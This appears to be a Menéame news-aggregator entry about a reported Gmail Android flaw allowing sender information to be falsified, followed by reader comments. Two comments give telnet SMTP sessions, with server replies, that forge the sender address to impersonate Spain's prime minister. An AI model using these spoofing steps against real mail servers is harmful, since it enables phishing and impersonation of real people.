8 meneos
70 clics
Detectan un fallo en la app de Gmail para Android que permite falsificar información de los correos
Un investigador ha descubierto un fallo de seguridad en la aplicación de Gmail para Android que permite la modificación de los datos originales de un mensaje enviado, que podría beneficiar sobre todo a los ciberdelincuentes, ya que permitiría el envío de un mensaje haciendo uso de una dirección concreta y posteriormente modificar esta para que el usuario crea que procede de otra.
|
comentarios cerrados
Hagan una pequeña prueba, es totalmente segura:
- Escojan un destinatario que puedan comprobar, por ejemplo FulanezDeTal@gmail.com
- usen una herramienta DNS-Loockup para averiguar el servidor de correo entrante para la direccion, gmail sería -> mxtoolbox.com/SuperTool.aspx?action=mx:gmail.com&run=toolpage
- Se elije un servidor de correo entrante, por ejemplo - gmail-smtp-in.l.google.com
- Abrir un terminal TELNET, si es windows (por ejemplo) escribir en la linea de comandos de MSDOS lo siguiente (-> es lo que esribimos nosotros y <- lo que responde el servidor):
-> telnet gmail-smtp-in.l.google.com 25 [Enter]
<- 220 mx.google.com ESMTP x203si13509081wme.16 - gsmtp
-> HELO me[Enter]
<- 250 mx.google.com at your service
-> MAIL FROM: <m_rajoy@lamoncloa.es>[Enter]
<- 250 2.1.0 OK x9si7729763wjf.139 - gsmtp
-> RCPT TO: <midireccion@gmail.com>[Enter]
<- 250 2.1.5 OK x9si7729763wjf.139 - gsmtp
-> DATA[Enter]
<- 354 Go ahead x9si7729763wjf.139 - gsmtp
-> Subject: esto es un correo[Enter]
-> [Enter]
-> esto es el cuerpo del texto ¡¡Insidiash!![Enter]
-> [Enter].[Enter]
<- 250 Ok mail sent x9si7729763wjf.139 - gsmtp
-> QUIT[Enter]
<- BYE x9si7729763wjf.139 - gsmtp
Revisen el correo, tienen un mensaje de Rajoy
Telnet al puerto 25
maquinaria.com25
helo asocial@asocial.com
> pleased to meet asocial@asocial.com
mail from: rajoy@victima.com
> administrador@victima.com ....sender is valid
data:
> Enter mail, end with "." on a line by itself
Estimado Sr. Capullo:......
> Mail accepted
quit:
> connection is closed
Por otro lado, me apunto lo del telnet.